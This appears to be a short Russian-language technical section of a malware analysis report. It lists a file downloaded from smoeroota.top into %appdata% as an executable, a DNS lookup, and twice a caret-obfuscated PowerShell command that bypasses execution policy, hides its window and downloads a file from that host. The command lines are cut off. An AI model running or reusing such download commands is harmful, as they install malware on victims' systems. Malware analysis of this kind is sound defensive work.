Техническая информация
- http://smoeroota.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poWER^ShEl^l^.ExE -E^XE^cutI^o^n^Po^L^i^cy ByPass ^-^n^oPROfILe -^wI^Ndows^TyLe hIDDEN ^(^nEW-O^BJ^eC^T ^S^ysTeM^.^neT.^w^e^bC^L^Ien^t).^dO^wn^L^O^adfiL^E^('http://smoeroota.top/...
- DNS ASK sm###oota.top
- '<SYSTEM32>\cmd.exe' /c "poWER^ShEl^l^.ExE -E^XE^cutI^o^n^Po^L^i^cy ByPass ^-^n^oPROfILe -^wI^Ndows^TyLe hIDDEN ^(^nEW-O^BJ^eC^T ^S^ysTeM^.^neT.^w^e^bC^L^Ien^t).^dO^wn^L^O^adfiL^E^('http://smoeroota.top/...' (со скрытым окном)